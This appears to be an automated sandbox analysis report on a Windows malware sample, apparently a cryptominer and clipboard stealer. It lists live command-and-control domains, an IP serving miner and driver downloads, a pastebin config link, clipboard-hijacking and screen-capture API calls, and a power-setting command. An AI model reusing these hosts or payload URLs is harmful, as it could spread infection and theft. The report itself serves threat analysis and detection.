                  Source: unknownHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 59Host: citydisco.bet
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 12:34:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-frame-options: DENYx-frame-options: DENYx-content-type-options: nosniffx-content-type-options: nosniffx-xss-protection: 1;mode=blockx-xss-protection: 1;mode=blockcache-control: public, max-age=1801CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 91fb902648ca22c3-ORD
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51
                  Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/
                  Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/C
                  Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/D
                  Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/J
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/WatchDog.exe
                  Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.drString found in binary or memory: http://185.215.113.51/WatchDog.exeEhttp://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.ex
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/WatchDog.exeP
                  Source: setupx 1.exe1.exe, 00000002.00000003.1308460293.000000000386A000.00000004.00000800.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2258316500.000000000386C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/WatchDogee
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/WinRing0x64.sys
                  Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256621404.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.drString found in binary or memory: http://185.215.113.51/WinRing0x64.sysChttps://pastebin.com/raw/YpJeSRBC
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/WinRing0x64.sysP
                  Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308909879.0000000000FCD000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256465217.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256041446.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308487060.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2255217438.0000000000ECB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/conhost.exe
                  Source: setupx 1.exe1.exe, 00000002.00000002.2256041446.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308487060.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/conhost.exe:
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/lolMiner.exe
                  Source: setupx 1.exe1.exe, 00000002.00000002.2256621404.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.exe
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/xmrig.exe
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51/xmrig.exeP
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.51D
                  Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.000000000317A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.10.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.000000000317A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.10.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.000000000317A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.10.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.000000000317A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.10.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                  Source: powershell.exe, 0000000D.00000002.1238344010.0000000003057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                  Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.comd
                  Source: powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003064000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1239270589.0000000004E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                  Source: powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                  Source: powershell.exe, 0000000D.00000002.1239270589.0000000004E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBLr
                  Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                  Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                  Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: setupx 1.exe1.exe, 00000002.00000003.1152775702.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308962927.0000000000FC7000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113377940.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182650520.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139527382.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256410561.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139805381.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182053990.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113252451.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/
                  Source: setupx 1.exe1.exe, 00000002.00000003.1152775702.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182053990.0000000000FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/D
                  Source: setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/Vs16c
                  Source: setupx 1.exe1.exe, 00000002.00000003.1082401555.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139485056.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113252451.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139728518.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2255908312.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1154406299.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIS
                  Source: setupx 1.exe1.exe, 00000002.00000002.2256041446.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308487060.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIS6
                  Source: setupx 1.exe1.exe, 00000002.00000003.1082401555.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISAAIA
                  Source: setupx 1.exe1.exe, 00000002.00000003.1082401555.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113252451.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISre
                  Source: setupx 1.exe1.exe, 00000002.00000003.1081790283.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet:443/gdJIS
                  Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet:443/gdJIS71025-5-
                  Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                  Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                  Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                  Source: powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003071000.00000004.00000800.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                  Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, logs.uce0.10.dr, logs.uce1.10.dr, logs.uce.10.drString found in binary or memory: https://pastebin.com/raw/YpJeSRBC
                  Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                  Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
                  Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                  Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                  Source: setupx 1.exe1.exe, 00000002.00000003.1083770178.00000000037E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                  Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                  Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                  Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49682 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49684 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49688 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49690 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49691 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49692 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49694 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.8:49699 version: TLS 1.2
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_0043E5B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,2_2_0043E5B0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_03581000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,2_2_03581000
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_0043E5B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,2_2_0043E5B0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 2_2_0043F276 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,2_2_0043F276

                  System Summary

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                  Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to behavior
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CC64600_2_00CC6460
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00C8553B0_2_00C8553B
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CC4CB00_2_00CC4CB0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CA1F500_2_00CA1F50
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00C950E00_2_00C950E0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CA00E00_2_00CA00E0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00C9A0F00_2_00C9A0F0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CD90F00_2_00CD90F0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CDE0F00_2_00CDE0F0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CEB0F00_2_00CEB0F0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CC60900_2_00CC6090
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CDC0500_2_00CDC050
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CBD0700_2_00CBD070
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CDD0700_2_00CDD070
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00C810000_2_00C81000
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CD60100_2_00CD6010
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CAE0200_2_00CAE020
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00C8E0300_2_00C8E030
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CEA0300_2_00CEA030
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00C841D00_2_00C841D0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CE41D00_2_00CE41D0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00C9F1900_2_00C9F190
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00C901A00_2_00C901A0
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00C991500_2_00C99150
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CB71700_2_00CB7170
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CB01100_2_00CB0110
                  Source: C:\Users\user\Desktop\setupx 1.exe1.exeCode function: 0_2_00CD41100_2_00CD4110
